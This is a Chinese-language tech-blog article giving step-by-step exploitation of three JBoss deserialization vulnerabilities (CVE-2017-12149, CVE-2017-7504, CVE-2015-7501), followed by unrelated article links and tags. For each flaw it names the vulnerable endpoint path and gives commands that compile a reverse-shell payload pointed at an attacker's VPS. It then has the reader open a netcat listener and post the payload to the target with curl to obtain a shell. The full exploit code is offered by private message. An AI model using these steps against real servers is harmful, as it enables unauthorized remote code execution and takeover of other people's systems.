网站首页 > 技术文章 正文
JBOSS AS 6.x反序列化(CVE-2017-12149)
漏洞影响5.x和6.x版本的JBOSSAS
1、检测目录 192.168.28.138:60899/invoker/readonly
2、Linux下编译java代码,然后生成反弹shell序列化文件,内容较长,可私信“jboss”获取代码
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap your_vps_ip:8888
3、nc监听上述反弹shell端口
4、向目标发送生成的序列化文件即可收到反弹shell
curl http://192.168.28.138:60899/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
5、接收反弹shell
JBOSS AS 4.x JbossMQ JMS反序列化(CVE-2017-7504)
影响范围:JBoss AS 4.x及之前版本。跟CVE-2017-12149使用同样的payload
1、检测目录192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet
2、nc监听
3、发送payload getshell
curl http://192.168.28.138:57287/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser
4、接收反弹shell
JBOSS Java反序列化(CVE-2015-7501)
也就是15年出来的Java反序列化漏洞
1、检测目录192.168.28.138:57287/invoker/JMXInvokerServlet
2、直接利用Java反序列化工具即可
私信“jboss”获取利用代码及工具。
猜你喜欢
- 2024-10-23 微软发布6月Win11累积更新KB5039212/KB5039213
- 2024-10-23 快速体验之《gor+diffy实现线上流量复制到测试环境》
- 2024-10-23 Colbie Caillat: Try(colbiecaillattry歌词)
- 2024-10-23 基于阿里云 ASK 的 Istio 微服务应用部署初探
- 2024-10-23 浅谈ElasticSearch 集群部署(elastic集群配置)
- 2024-10-23 Python项目中跟踪系统导入Zipkin(基于python的目标跟踪算法)
- 2024-10-23 JVM参数及调优(jvm调优常用参数)
- 2024-10-23 Elasticsearch的路由routing的应用技巧
- 2024-10-23 如何将Elasticsearch的快照备份至OSS
- 2024-10-23 利用工具curl来查看http请求和https请求
- 最近发表
- 标签列表
-
- cmd/c (90)
- c++中::是什么意思 (84)
- 标签用于 (71)
- 主键只能有一个吗 (77)
- c#console.writeline不显示 (95)
- pythoncase语句 (88)
- es6includes (74)
- sqlset (76)
- apt-getinstall-y (100)
- node_modules怎么生成 (87)
- chromepost (71)
- flexdirection (73)
- c++int转char (80)
- mysqlany_value (79)
- static函数和普通函数 (84)
- el-date-picker开始日期早于结束日期 (76)
- js判断是否是json字符串 (75)
- c语言min函数头文件 (77)
- asynccallback (71)
- localstorage.removeitem (74)
- vector线程安全吗 (70)
- java (73)
- js数组插入 (83)
- mac安装java (72)
- 无效的列索引 (74)